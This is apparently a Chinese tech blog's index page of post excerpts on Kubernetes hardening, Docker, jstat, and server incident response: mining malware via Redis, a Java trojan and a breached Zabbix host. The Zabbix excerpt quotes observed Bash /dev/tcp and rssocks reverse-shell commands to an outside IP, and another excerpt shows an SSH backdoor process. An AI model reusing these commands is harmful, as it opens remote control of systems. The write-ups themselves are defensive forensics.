当前位置:8090社团 >
  • Kubernetes提供了许多可以极大地提高应用程序安全性的选项,配置它们要求您熟悉Kubernetes以及其部署的安全要求。本文具体介绍了Kubernetes服务的安全加固方案,帮助您部署安全的Kubernetes应用。 安全加固方案 确保镜像没有安全漏洞 在部署前,应该确保所有的操作系...
  • 目标 当我们刚接触Kubernetes进行测试集群的搭建时,往往会选择一篇已有的教程,照着教程完成集群搭建。我们很少去质疑教程作者每一步操作的合理性,只想快点把集群搭建起来,早点开始实际的上手体验。 与测试集群不同,对于生产级别的部署,我们会有更加严格的要求...
  • 07-11
    环境搭建 超过181 人围观 0条评论
    1 docker ce 介绍 1.1 docker ce功能 Docker CE是简单的经典OSS Docker企业版。 Docker EE是在某些系统上获得认证,并由Docker Inc.提供支持 的 Docker CE版本。 Docker CS(商业支持)是版本<= 1.13的Docker EE的旧捆绑版本。 Docker CE是免费的Docker...
  • 07-11
    杂七杂八 超过177 人围观 0条评论
    jstat 用法 $ jstat -help Usage: jstat -help|-options jstat -<option> [-t] [-h<lines>] <vmid> [<interval> [<count>]] Definitions: <option> An option reported by the -options option ...
  • 03-26
    故障解决 超过1114 人围观 0条评论
    java程序挂马
    0x01 背景 本周是在目前公司的最后一周,周五就离职了,在这里待了2年半时间,说短也不短,职业生涯可能也没多少个2年半。出门和同事去撸串的路上收到的告警,急忙赶回来处理,很简单的一次应急,没什么技术含量,因为时间点特殊才想着记录一下,毕竟是最...
  • 03-26
    故障解决 超过1229 人围观 0条评论
    Linux服务器挖矿病毒
    攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。 排查过程 检查进程发现SSH后门 [root@testserver tmp]# ps aux | grep 2345 | grep -v grep root 13587 0.0 0.0 66624 1144 ? Ss Mar22 0:00 /tmp/su -oPort=2345 [root@testserver tmp]# lso...
  • 03-26
    故障解决 超过1120 人围观 0条评论
    Linux服务器对外发包
    一哥们反应自己的测试机器总是关机,联系云主机客服得知服务器总是大量发包,导致技术关停该机器。 排查过程 Last查看登录记录 查找到一个可疑IP [root@i-9kp9tipm dpkgd]# grep "1.180.212.21" /var/log/secure* /var/log/secure-20170409:Apr 4 22:2...
  • 03-26
    故障解决 超过1138 人围观 0条评论
    zabbix服务器被入侵解决
    0x01 背景 2017.3.27中午运维反应怀疑zabbix所在服务器被入侵。 0x02 排查过程 ps查看进程,发现端口反弹行为 Bash反弹:/dev/tcp/107.151.149.242/82 0>&1 Python反弹:rssocks -s 107.151.149.242:1080 查看进程启动时间发现为Feb 27,启动账...